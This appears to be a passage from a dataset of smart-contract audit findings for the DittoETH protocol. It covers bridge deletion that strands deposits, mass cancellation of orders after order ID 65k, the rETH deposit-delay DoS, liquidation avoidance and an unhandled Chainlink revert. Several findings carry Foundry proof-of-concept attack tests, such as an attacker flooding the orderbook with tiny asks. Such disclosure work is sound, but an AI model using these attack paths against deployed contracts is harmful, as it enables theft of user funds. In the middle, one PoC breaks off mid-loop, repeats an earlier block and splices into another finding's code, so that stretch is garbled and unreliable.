`BridgeROuter.t.sol` contract\\nIn `DeployHelper.sol` another bridge and vault have to be added in order for the test to run:\\n```\\n/// INFO: added by auditor\\n IBridge public bridgeRethToBeDeleted;\\n address public _bridgeRethToBeDeleted;\\n IAsset public zethToBeDeletedVault;\\n address public _zethToBeDeletedVault;\\n IRocketStorage public rocketStorageA;\\n address public _rocketStorageA;\\n IRocketTokenRETH public rethA;\\n address public _rethA;\\n```\\n\\nAdd the following to `deployContracts()` function\\n```\\nif (chainId == 31337) {\\n //mocks\\n _immutableCreate2Factory = deployCode(\"ImmutableCreate2Factory.sol\");\\n\\n if (isMock) {\\n _steth = deployCode(\"STETH.sol\");\\n _unsteth = deployCode(\"UNSTETH.sol\", abi.encode(_steth));\\n _rocketStorage = deployCode(\"RocketStorage.sol\");\\n _reth = deployCode(\"RocketTokenRETH.sol\");\\n reth = IRocketTokenRETH(_reth);\\n _ethAggregator = deployCode(\"MockAggregatorV3.sol\");\\n /// INFO: added by auditor\\n _rocketStorageA = deployCode(\"RocketStorage.sol\");\\n _rethA = deployCode(\"RocketTokenRETH.sol\");\\n rethA = IRocketTokenRETH(_rethA);\\n }\\n\\n rocketStorage = IRocketStorage(_rocketStorage);\\n /// INFO: added by auditor\\n rocketStorageA = IRocketStorage(_rocketStorageA);\\n steth = ISTETH(_steth);\\n unsteth = IUNSTETH(payable(_unsteth));\\n ethAggregator = IMockAggregatorV3(_ethAggregator);\\n }\\n\\n/// INFO: Added by auditor \\n _zethToBeDeletedVault = factory.safeCreate2(\\n salt,\\n abi.encodePacked(\\n vm.getCode(\"Asset.sol:Asset\"), abi.encode(_diamond, \"Zebra ETH Two\", \"ZETHT\")\\n )\\n );\\n\\n _bridgeRethToBeDeleted = factory.safeCreate2(\\n salt,\\n abi.encodePacked(\\n vm.getCode(\"BridgeReth.sol:BridgeReth\"),\\n abi.encode(_rocketStorageA, _diamond)\\n )\\n );\\n\\n bridgeRethToBeDeleted = IBridge(_bridgeRethToBeDeleted);\\n MTypes.CreateVaultParams memory vaultParams;\\n vaultParams.zethTithePercent = 10_00;\\n vaultParams.dittoMatchedRate = 1;\\n vaultParams.dittoShorterRate = 1;\\n diamond.createVault({zeth: _zeth, vault: Vault.CARBON, params: vaultParams});\\n\\n MTypes.CreateVaultParams memory vaultParamsTwo;\\n vaultParamsTwo.zethTithePercent = 9_00;\\n vaultParamsTwo.dittoMatchedRate = 1;\\n vaultParamsTwo.dittoShorterRate = 1;\\n zethToBeDeletedVault = IAsset(_zethToBeDeletedVault);\\n diamond.createVault({zeth: _zethToBeDeletedVault, vault: 2, params: vaultParamsTwo});\\n STypes.Vault memory carbonVaultConfigTwo = diamond.getVaultStruct(2);\\n assertEq(carbonVaultConfigTwo.zethTithePercent, 9_00);\\n\\n diamond.createBridge({\\n bridge: _bridgeRethToBeDeleted,\\n vault: 2,\\n withdrawalFee: 150,\\n unstakeFee: 0\\n });\\n \\n if (isMock) {\\n rocketStorage.setDeposit(_reth);\\n rocketStorage.setReth(_reth);\\n /// INFO: added by auditor\\n rocketStorageA.setDeposit(_rethA);\\n rocketStorageA.setReth(_rethA);\\n _setETH(4000 ether);\\n }\\n```\\n\\nTo run the test use `forge test -vvv --mt test_DeleteBridgeWithAsset`чIn `deleteBridge()` make sure that the contract doesn't have any assetsчUser's deposited `RETH` or `STETH` in that bridge will be lost, as the user doesn't have the option to withdraw them. Because the withdraw functions can only be called trough the `Diamond.sol`ч```\\nfunction test_DeleteBridgeWithAssets() public {\\n console.log(\"Sender ethEscrowed in vault 2 before deposit: \", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n deal(_rethA, sender, 10000 ether);\\n\\n vm.startPrank(sender);\\n uint88 deposit1 = 1000 ether;\\n uint88 withdrawAmount = 100 ether;\\n diamond.deposit(_bridgeRethToBeDeleted, deposit1);\\n console.log(\"Sender ethEscrowed in vault2 after deposit: \", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(\"Sender ethEscrowed after withdraw: \", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n vm.stopPrank();\\n\\n console.log(\"Balance of reth in the bridgeRethToBeDeleted: \", rethA.balanceOf(_bridgeRethToBeDeleted));\\n\\n /// INFO: DAO deletes the bridge after a vote has been passed\\n vm.startPrank(owner) ;\\n diamond.deleteBridge(_bridgeRethToBeDeleted);\\n vm.stopPrank();\\n\\n vm.startPrank(sender);\\n vm.expectRevert();\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(\"Balance of reth in the bridgeRethToBeDeleted: \", rethA.balanceOf(_bridgeRethToBeDeleted));\\n vm.stopPrank();\\n }\\n```\\n -Users Lose Funds and Market Functionality Breaks When Market Reachs 65k Idчhighчif the orderbook of any market reach 65,000 dao can call the function cancelOrderFarFromOracle multiple times to cancel many orders up to 1000 order in each transaction ,or anyone can cancle the last order in one call.the users who issued the canclled orders will lost thier deposits.and the canclled process is not limited to a certain orders numbers.\\nsource : contracts/facets/OrderFacet.sol\\nFunction : cancelOrderFarFromOracle\\nwhen ever a user create a limit order (short limit,bid limit,ask limit), if the order did not match it get added to the orderbook, and the `assets amount` or `eth amount` uses to create this order is taken from the Virtual balance of the user in the system .\\nuserVault(in case of `bids` and shorts) or userAsset(in case of asks) we can see that here :\\n` // for asks:\\n s.assetUser[asset][order.addr].ercEscrowed -= order.ercAmount;\\n // for `shorts` :\\n s.vaultUser[vault][order.addr].ethEscrowed -= eth;\\n //for `bids` :\\n s.vaultUser[vault][order.addr].ethEscrowed -= eth;`\\nalso if there is no id's Recycled behind the Head the id for this orders gonna be the current id in s.asset[asset].orderId,and the `s.asset[asset].orderId` get increamented by one . this is true for all three types of orders. (shorts,asks,bids).\\nnow in case this ordersId reach 65k for a specific market, the DAO are able to cancle the last 1000 order, and any one can cancle last order in one call. since it's only checks for the ordersId > 65000.and by the last order i mean the last order of any time of limit orders (asks,shorts,bids).\\n`function cancelOrderFarFromOracle(address asset, O orderType, uint16 lastOrderId, uint16 numOrdersToCancel)\\n external\\n onlyValidAsset(asset)\\n nonReentrant\\n{\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n\\n if (numOrdersToCancel > 1000) {\\n revert Errors.CannotCancelMoreThan1000Orders();\\n }\\n\\n if (msg.sender == LibDiamond.diamondStorage().contractOwner) {\\n if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.bids.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.asks.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.shorts.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else {\\n revert Errors.NotLastOrder();\\n }\\n } else {\\n //@dev if address is not DAO, you can only cancel last order of a side\\n if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.bids.cancelOrder(asset, lastOrderId);\\n } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.asks.cancelOrder(asset, lastOrderId);\\n } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.shorts.cancelOrder(asset, lastOrderId);\\n } else {\\n revert Errors.NotLastOrder();\\n }\\n }\\n}\\n... ....\\n// cancle many orders no extra checks :\\nfunction cancelManyOrders(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n uint16 lastOrderId,\\n uint16 numOrdersToCancel\\n ) internal {\\n uint16 prevId;\\n uint16 currentId = lastOrderId;\\n for (uint8 i; i < numOrdersToCancel;) {\\n prevId = orders[asset][currentId].prevId;\\n LibOrders.cancelOrder(orders, asset, currentId);\\n currentId = prevId;\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n...... .....\\n// no extrac checks in cancleOrder() function also. it set the order to Cancelled , remove it from the list, and Set it to be reused:\\nfunction cancelOrder(mapping(address => mapping(uint16 => STypes.Order)) storage orders, address asset, uint16 id)\\n internal\\n {\\n uint16 prevHEAD = orders[asset][Constants.HEAD].prevId;\\n\\n // remove the links of ID in the market\\n // @dev (ID) is exiting, [ID] is inserted\\n // BEFORE: PREV <-> (ID) <-> NEXT\\n // AFTER : PREV <----------> NEXT\\n orders[asset][orders[asset][id].nextId].prevId = orders[asset][id].prevId;\\n orders[asset][orders[asset][id].prevId].nextId = orders[asset][id].nextId;\\n\\n // create the links using the other side of the HEAD\\n emit Events.CancelOrder(asset, id, orders[asset][id].orderType);\\n _reuseOrderIds(orders, asset, id, prevHEAD, O.Cancelled);\\n}`\\nas we said the user balance get decreaced by the `value` of it's order he created. but since the order is set to cancelled the user never gonna be able to recieve thier amount back.cause cancelled orders can't be matched Neither cancelled again.\\nEx:\\na user create a limit bid as follow : {price: 0.0001 ether, amount: 10000 ether}.\\nwhen this order get cancelled : the user will loose : 0.0001 * 10000 = `1 ether` ZETH (or ETH)\\nthe shorters will lose more then others since thier balance get decreaced by : PRICE * AMOUNT * MARGIN.\\nThe second issue is there is no limit for how many orders can be cancelled. you can cancel the whole orders in a market that reaches 65K `orderId`. `limits shorts` ,limits `asks` or `limit bids` .starting from the last one.since the only Conditionto be able to cancel orders is the asset order ID reached this number. and if it reachs it. it never decrease .even if there is alot of orders behind head(non active) to be reused.\\na malicious actor Can targeted this vulnerability by creating numerous tiny limit `asks` pushing the `orderId` to be too high .and he can do so by creating `ask` with a very high price and very small amount so he can pass the `MinEth` amount check, he can just with less then `1 cusd` (in case of cusd market) create a bunsh of limit `asks` orders .\\nPOC :\\nusing the the main repo setup for testing , here a poc shows how a malicious user can fill the orderbook with bunsh of tiny `limit asks` with little cost. and how you can cancle all orders in case the orderId reachs 65k. also that there is no refund for the users that created this orders.\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Errors} from \"contracts/libraries/Errors.sol\";\\nimport {Events} from \"contracts/libraries/Events.sol\";\\nimport {STypes, MTypes, O} from \"contracts/libraries/DataTypes.sol\";\\nimport {Constants} from \"contracts/libraries/Constants.sol\";\\nimport \"forge-std/console.sol\";\\nimport {OBFixture} from \"test/utils/OBFixture.sol\";\\n// import {console} from \"contracts/libraries/console.sol\";\\n\\ncontract POC is OBFixture {\\n address[3] private bidders = [address(435433), address(423432523), address(522366)];\\n address[3] private shorters = [address(243422243242), address(52353646324532), address(40099)];\\n address attacker = address(3234);\\n function setUp() public override {\\n super.setUp();\\n }\\n\\n // an attacker can fill the order book with a bunsh of asks that have too high price and low asset \\n function test_fillWithAsks() public {\\n // create a bunsh of asks with a high price :\\n depositUsd(attacker, DEFAULT_AMOUNT * 10000);\\n uint balanceAssetBefore = diamond.getAssetBalance(asset,attacker);\\n // minAsk = 0.0001 ether . 0.0001 ether = x * 1 , x =0.0001 ether * 1 ether\\n vm.startPrank(attacker);\\n for (uint i ; i< 1000 ;i++){\\n createLimitAsk( 10**24, 10**10); \\n }\\n vm.stopPrank();\\n STypes.Order[] memory asks = diamond.getAsks(asset);\\n console.log(\"tiny asks created : \", asks.length);\\n console.log( \"hack cost asset\", balanceAssetBefore - diamond.getAssetBalance(asset,attacker));\\n\\n }\\n function test_cancleOrders() public {\\n //set the assetid to 60000;\\n diamond.setOrderIdT(asset,64998);\\n // create multiple bids and 1 shorts\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, bidders[0]); // id 64998\\n fundLimitShortOpt(uint80(DEFAULT_PRICE)*4, DEFAULT_AMOUNT, shorters[0]); //id 64999\\n fundLimitBidOpt(DEFAULT_PRICE*2, DEFAULT_AMOUNT, bidders[1]); // id 65000\\n fundLimitBidOpt(DEFAULT_PRICE*3 , DEFAULT_AMOUNT, bidders[2]); //id 65001\\n /* now we have the lists like this :\\n - for bids : Head <- Head <->65001<->65000<->64998->Tail\\n - for shorts: Head <- Head <->64999->Tail\\n */\\n\\n //lets cancle the all the bids :\\n canclebid(64998);\\n // - now : Head <-64998<-> Head <->65001<->65000->Tail\\n uint s1 = vm.snapshot();\\n vm.revertTo(s1);\\n canclebid(65000);\\n // - now : Head <-64998<->65000<-> Head <->65001->Tail\\n uint s2 = vm.snapshot();\\n vm.revertTo(s2);\\n canclebid(65001);\\n // - now : Head <-64998<->65000<->65001<-> Head ->Tail\\n // let's check the active bids :\\n STypes.Order[] memory Afterbids = diamond.getBids(asset);\\n // notice that we were able to delete all the bids even there was unActive ID's to be reused.\\n assertTrue(Afterbids.length == 0);\\n // also notice that the owners of this orders did not get refund thier zeth back that have been taken from them when they create this orders.\\n\\n for (uint i; i65001<->65000<->64998->Tail\\n - for shorts: Head <- Head <->64999->Tail\\n */\\n\\n //lets cancle the all the bids :\\n canclebid(64998);\\n // - now : Head <-64998<-> Head <->65001<->65000->Tail\\n uint s1 = vm.snapshot();\\n vm.revertTo(s1);\\n canclebid(65000);\\n // - now : Head <-64998<->65000<-> Head <->65001->Tail\\n uint s2 = vm.snapshot();\\n vm.revertTo(s2);\\n canclebid(65001);\\n // - now : Head <-64998<->65000<->65001<-> Head ->Tail\\n // let's check the active bids :\\n STypes.Order[] memory Afterbids = diamond.getBids(asset);\\n // notice that we were able to delete all the bids even there was unActive ID's to be reused.\\n assertTrue(Afterbids.length == 0);\\n // also notice that the owners of this orders did not get refund thier zeth back that have been taken from them when they create this orders.\\n\\n for (uint i; i 0) {\\n // Ensure enough blocks have passed\\n uint256 depositDelay = getUint(keccak256(abi.encodePacked(keccak256(\"dao.protocol.setting.network\"), \"network.reth.deposit.delay\")));\\n uint256 blocksPassed = block.number.sub(lastDepositBlock);\\n require(blocksPassed > depositDelay, \"Not enough time has passed since deposit\");\\n // Clear the state as it's no longer necessary to check this until another deposit is made\\n deleteUint(key);\\n }\\n }\\n }\\n```\\n\\nAny future changes made to this delay by the admins could potentially lead to a denial-of-service attack on the `BridgeRouterFacet::deposit` and `BridgeRouterFacet::withdraw` mechanism for the rETH bridge.чPossible DOS on deposit(), withdraw() and unstake() for BridgeReth, leading to user loss of funds\\nConsider modifying Reth bridge to obtain rETH only through the UniswapV3 pool, on average users will get less rETH due to the slippage, but will avoid any future issues with the deposit delay mechanism.чCurrently, the delay is set to zero, but if RocketPool admins decide to change this value in the future, it could cause issues. Specifically, protocol users staking actions could prevent other users from unstaking for a few hours. Given that many users call the stake function throughout the day, the delay would constantly reset, making the unstaking mechanism unusable. It's important to note that this only occurs when stake() is used through the rocketDepositPool route. If rETH is obtained from the Uniswap pool, the delay is not affected.\\nAll the ETH swapped for rETH calling `BridgeReth::depositEth` would become irrecuperable, leading to a user bank run on DittoETH to not be perjudicated of this protocol externalization to all the users that have deposited.ч```\\n // This is called by the base ERC20 contract before all transfer, mint, and burns\\n function _beforeTokenTransfer(address from, address, uint256) internal override {\\n // Don't run check if this is a mint transaction\\n if (from != address(0)) {\\n // Check which block the user's last deposit was\\n bytes32 key = keccak256(abi.encodePacked(\"user.deposit.block\", from));\\n uint256 lastDepositBlock = getUint(key);\\n if (lastDepositBlock > 0) {\\n // Ensure enough blocks have passed\\n uint256 depositDelay = getUint(keccak256(abi.encodePacked(keccak256(\"dao.protocol.setting.network\"), \"network.reth.deposit.delay\")));\\n uint256 blocksPassed = block.number.sub(lastDepositBlock);\\n require(blocksPassed > depositDelay, \"Not enough time has passed since deposit\");\\n // Clear the state as it's no longer necessary to check this until another deposit is made\\n deleteUint(key);\\n }\\n }\\n }\\n```\\n -ETH cannot always be unstaked using Rocket PoolчlowчThe protocol lets users unstake Ethereum using any bridge they want. Rocket Pool may not have enough ETH to satisfy unstake transactions, this will cause the transaction to revert.\\nWhen users try to unstake ETH using Rocket Pool, the transaction may revert because Rocket Pool may not have enough ETH in its deposit pool and rEth contract to satisfy the unstake request. Rocket pool sources ETH for unstaking from the rEth contract and deposit pool. When they are empty it cannot satisfy unstake requests. More information can be found in the Unstake section of the rocketPool documentation.\\nThe pools have been empty before. Here's a proof of concept of failed withdrawals when Rocket Pool's rEth contract and deposit pool were empty at block 15361748.\\n```\\n function testWithdrawETHfromRocketPool() public{\\n string memory MAINNET_RPC_URL = vm.envString(\"MAINNET_RPC_URL\");\\n uint256 mainnetFork = vm.createFork(MAINNET_RPC_URL, 15361748);\\n\\n RocketTokenRETHInterface rEth = RocketTokenRETHInterface(0xae78736Cd615f374D3085123A210448E74Fc6393);\\n vm.selectFork(mainnetFork);\\n uint totalCollateral = rEth.getTotalCollateral();\\n assertEq(totalCollateral, 0); // pools are empty\\n\\n address owner = 0x50A78DFb9F5CC22ac8ffA90FA2B6C595881CCb97; // has rEth at block 15361748\\n uint rEthBalance = rEth.balanceOf(owner);\\n assertGt(rEthBalance, 0);\\n \\n vm.expectRevert(\"Insufficient ETH balance for exchange\");\\n vm.prank(owner); \\n rEth.burn(rEthBalance);\\n }\\n```\\nчCheck if Rocket Pool has enough ETH and if it doesn't, rEth can be exchanged for ETH on a DEX and sent to the user.чIf Rocket Pool's rEth contract and deposit Pool do not have enough ETH to satisfy an unstake transaction the transaction will revert.ч```\\n function testWithdrawETHfromRocketPool() public{\\n string memory MAINNET_RPC_URL = vm.envString(\"MAINNET_RPC_URL\");\\n uint256 mainnetFork = vm.createFork(MAINNET_RPC_URL, 15361748);\\n\\n RocketTokenRETHInterface rEth = RocketTokenRETHInterface(0xae78736Cd615f374D3085123A210448E74Fc6393);\\n vm.selectFork(mainnetFork);\\n uint totalCollateral = rEth.getTotalCollateral();\\n assertEq(totalCollateral, 0); // pools are empty\\n\\n address owner = 0x50A78DFb9F5CC22ac8ffA90FA2B6C595881CCb97; // has rEth at block 15361748\\n uint rEthBalance = rEth.balanceOf(owner);\\n assertGt(rEthBalance, 0);\\n \\n vm.expectRevert(\"Insufficient ETH balance for exchange\");\\n vm.prank(owner); \\n rEth.burn(rEthBalance);\\n }\\n```\\n -Users can avoid liquidation while being under the primary liquidation ratio if on the last short recordчhighчThe protocol permits users to maintain up to 254 concurrent short records. When this limit is reached, any additional orders are appended to the final position, rather than creating a new one. A short record is subject to flagging if it breaches the primary liquidation ratio set by the protocol, leading to potential liquidation if it remains below the threshold for a predefined period.\\nThe vulnerability emerges from the dependency of liquidation times on the `updatedAt` value of shorts. For the last short record, the appending of any new orders provides an alternative pathway for updating the `updatedAt` value of shorts, enabling users to circumvent liquidation by submitting minimal shorts to block liquidation by adjusting the time difference, thus avoiding liquidation even when they do not meet the collateral requirements for a healthy state.\\nlets take a look at the code to see how this works.\\nFlagging of Short Record:\\nThe `flagShort` function allows a short to be flagged if it's under `primaryLiquidationCR`, subsequently invoking `setFlagger` which updates the short's `updatedAt` timestamp to the current time.\\n```\\nfunction flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n {\\n // initial code\\n\\n short.setFlagger(cusd, flaggerHint);\\n emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n }\\n```\\n\\nLiquidation Eligibility Check:\\nThe `_canLiquidate` function assesses whether the flagged short is still under `primaryLiquidationCR` after a certain period and if it's eligible for liquidation, depending on the `updatedAt` timestamp and various liquidation time frames.\\n```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n {\\n // Initial code\\n\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n\\n if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n\\n return true;\\n }\\n }\\n}\\n```\\n\\nShort Record Merging:\\nFor the last short record, the `fillShortRecord` function combines new matched shorts with the existing one, invoking the `merge` function, which updates the `updatedAt` value to the current time.\\n```\\nfunction fillShortRecord(\\n address asset,\\n address shorter,\\n uint8 shortId,\\n SR status,\\n uint88 collateral,\\n uint88 ercAmount,\\n uint256 ercDebtRate,\\n uint256 zethYieldRate\\n ) internal {\\n AppStorage storage s = appStorage();\\n\\n uint256 ercDebtSocialized = ercAmount.mul(ercDebtRate);\\n uint256 yield = collateral.mul(zethYieldRate);\\n\\n STypes.ShortRecord storage short = s.shortRecords[asset][shorter][shortId];\\n if (short.status == SR.Cancelled) {\\n short.ercDebt = short.collateral = 0;\\n }\\n\\n short.status = status;\\n LibShortRecord.merge(\\n short,\\n ercAmount,\\n ercDebtSocialized,\\n collateral,\\n yield,\\n LibOrders.getOffsetTimeHours()\\n );\\n }\\n```\\n\\nIn the merge function we see that we update the updatedAt value to creationTime which is LibOrders.getOffsetTimeHours().\\n```\\nfunction merge(\\n STypes.ShortRecord storage short,\\n uint88 ercDebt,\\n uint256 ercDebtSocialized,\\n uint88 collateral,\\n uint256 yield,\\n uint24 creationTime\\n ) internal {\\n // Resolve ercDebt\\n ercDebtSocialized += short.ercDebt.mul(short.ercDebtRate);\\n short.ercDebt += ercDebt;\\n short.ercDebtRate = ercDebtSocialized.divU64(short.ercDebt);\\n // Resolve zethCollateral\\n yield += short.collateral.mul(short.zethYieldRate);\\n short.collateral += collateral;\\n short.zethYieldRate = yield.divU80(short.collateral);\\n // Assign updatedAt\\n short.updatedAt = creationTime;\\n }\\n```\\n\\nThis means that even if the position was flagged and is still under the `primaryLiquidationCR`, it cannot be liquidated as the `updatedAt` timestamp has been updated, making the time difference not big enough.\\nчImpose stricter conditions for updating the last short record when the position is flagged and remains under the `primaryLiquidationCR` post-merge, similar to how the `combineShorts` function works.\\n```\\nfunction createShortRecord(\\n address asset,\\n address shorter,\\n SR status,\\n uint88 collateral,\\n uint88 ercAmount,\\n uint64 ercDebtRate,\\n uint80 zethYieldRate,\\n uint40 tokenId\\n ) internal returns (uint8 id) {\\n AppStorage storage s = appStorage();\\n\\n // Initial code\\n\\n } else {\\n // All shortRecordIds used, combine into max shortRecordId\\n id = Constants.SHORT_MAX_ID;\\n fillShortRecord(\\n asset,\\n shorter,\\n id,\\n status,\\n collateral,\\n ercAmount,\\n ercDebtRate,\\n zethYieldRate\\n );\\n\\n // If the short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (Constants.SHORT_MAX_ID.shortFlagExists) {\\n if (\\n Constants.SHORT_MAX_ID.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n Constants.SHORT_MAX_ID.resetFlag();\\n }\\n }\\n }\\n```\\nчThis allows a user with a position under the primaryLiquidationCR to avoid primary liquidation even if the short is in the valid time ranges for liquidation.ч```\\nfunction flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n {\\n // initial code\\n\\n short.setFlagger(cusd, flaggerHint);\\n emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n }\\n```\\n -Incorrect require in setterчlowчThere are 3 setters in `OwnerFacet.sol` which require statement doesn't match with the error message.\\n`_setInitialMargin`, `_setPrimaryLiquidationCR` and `_setSecondaryLiquidationCR` will revert for the value 100, which will revert with an incorrect error message, which is `\"below 1.0\"`. When 100 is 1.0, not below.\\n*Instances (3)`\\n```\\n function _setInitialMargin(address asset, uint16 value) private {\\n require(value > 100, \"below 1.0\"); // @audit a value of 100 is 1x, so this should be > 101\\n s.asset[asset].initialMargin = value;\\n require(LibAsset.initialMargin(asset) < Constants.CRATIO_MAX, \"above max CR\");\\n }\\n\\n function _setPrimaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, \"below 1.0\"); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, \"above 5.0\");\\n require(value < s.asset[asset].initialMargin, \"above initial margin\");\\n s.asset[asset].primaryLiquidationCR = value;\\n }\\n\\n function _setSecondaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, \"below 1.0\"); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, \"above 5.0\");\\n require(value < s.asset[asset].primaryLiquidationCR, \"above primary liquidation\");\\n s.asset[asset].secondaryLiquidationCR = value;\\n }\\n```\\n\\nAs it is contrastable, in the below functions, this check is done correctly:\\n```\\n function _setForcedBidPriceBuffer(address asset, uint8 value) private {\\n require(value >= 100, \"below 1.0\");\\n require(value <= 200, \"above 2.0\");\\n s.asset[asset].forcedBidPriceBuffer = value;\\n }\\n\\n function _setMinimumCR(address asset, uint8 value) private {\\n require(value >= 100, \"below 1.0\");\\n require(value <= 200, \"above 2.0\");\\n s.asset[asset].minimumCR = value;\\n require(\\n LibAsset.minimumCR(asset) < LibAsset.secondaryLiquidationCR(asset),\\n \"above secondary liquidation\"\\n );\\n }\\n```\\nчValue to which is checked the `>` operator should be 101, not 100.чThe incorrect value for the require statement could lead to a restriction of precion for this parameters, it wouldn't be possible to input a net value of 100.ч```\\n function _setInitialMargin(address asset, uint16 value) private {\\n require(value > 100, \"below 1.0\"); // @audit a value of 100 is 1x, so this should be > 101\\n s.asset[asset].initialMargin = value;\\n require(LibAsset.initialMargin(asset) < Constants.CRATIO_MAX, \"above max CR\");\\n }\\n\\n function _setPrimaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, \"below 1.0\"); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, \"above 5.0\");\\n require(value < s.asset[asset].initialMargin, \"above initial margin\");\\n s.asset[asset].primaryLiquidationCR = value;\\n }\\n\\n function _setSecondaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, \"below 1.0\"); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, \"above 5.0\");\\n require(value < s.asset[asset].primaryLiquidationCR, \"above primary liquidation\");\\n s.asset[asset].secondaryLiquidationCR = value;\\n }\\n```\\n -Unhandled chainlink revert in case its multisigs block access to price feedsчlowчIn some extreme cases, oracles can be taken offline or token prices can fall to zero. Therefore a call to `latestRoundData` could potentially revert and none of the circuit breakers would fallback to query any prices automatically.\\nAccording to Ditto's documentation in https://dittoeth.com/technical/oracles, there are two circuit breaking events if Chainlink data becomes unusable: Invalid Fetch Data and Price Deviation.\\nThe issue arises from the possibility that Chainlink multisignature entities might intentionally block access to the price feed. In such a scenario, the invocation of the `latestRoundData` function could potentially trigger a revert, rendering the circuit-breaking events ineffective in mitigating the consequences, as they would be incapable of querying any price data or specific information.\\nIn certain exceptional circumstances, Chainlink has already taken the initiative to temporarily suspend specific oracles. As an illustrative instance, during the UST collapse incident, Chainlink opted to halt the UST/ETH price oracle to prevent the dissemination of erroneous data to various protocols.\\nAdditionally, these dangerous oracle's scenarios are very well documented by OpenZeppelin in https://blog.openzeppelin.com/secure-smart-contract-guidelines-the-dangers-of-price-oracles. For our context:\\n\"While currently there's no whitelisting mechanism to allow or disallow contracts from reading prices, powerful multisigs can tighten these access controls. In other words, the multisigs can immediately block access to price feeds at will. Therefore, to prevent denial of service scenarios, it is recommended to query ChainLink price feeds using a defensive approach with Solidity's try/catch structure. In this way, if the call to the price feed fails, the caller contract is still in control and can handle any errors safely and explicitly\".\\nAlthough a fallback mechanism, specifically the TWAP, is in place to uphold system functionality in the event of Chainlink failure, it is imperative to note that Ditto's documentation explicitly underscores its substantial reliance on oracles. Consequently, it is imperative to address this issue comprehensively within the codebase, given that it pertains to one of the fundamental functionalities of the environment.\\nAs mentioned above, In order to mitigate the potential risks associated with a denial-of-service scenario, it is advisable to employ a `try-catch` mechanism when querying Chainlink prices in the function `getOraclePrice` under LibOracle.sol. Through this approach, in the event of a failure in the invocation of the price feed, the caller contract retains command and can adeptly manage any errors in a secure and explicit manner.\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/libraries/LibOracle.sol#L25-L32\\n```\\n (\\n uint80 baseRoundID,\\n int256 basePrice,\\n /*uint256 baseStartedAt*/\\n ,\\n uint256 baseTimeStamp,\\n /*uint80 baseAnsweredInRound*/\\n ) = baseOracle.latestRoundData();\\n```\\n\\nHere I enumerate some of the core functions that will be affected in case of an unhandled oracle revert:\\nFunction createMarket under OwnerFacet.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/facets/OwnerFacet.sol#L47-L68\\nFunction updateOracleAndStartingShort under LibOrders.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/libraries/LibOrders.sol#L812-L816\\nFunction getShortIdAtOracle under ViewFaucet.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/facets/ViewFacet.sol#L173-L187чEncase the invocation of the function `latestRoundData()` within a `try-catch` construct instead of invoking it directly. In circumstances where the function call results in a revert, the catch block may serve the purpose of invoking an alternative oracle or managing the error in a manner that is deemed appropriate for the system.чIf a configured Oracle feed has malfunctioned or ceased operating, it will produce a revert when checking for `latestRoundData` that would need to be manually handled by the system.ч```\\n (\\n uint80 baseRoundID,\\n int256 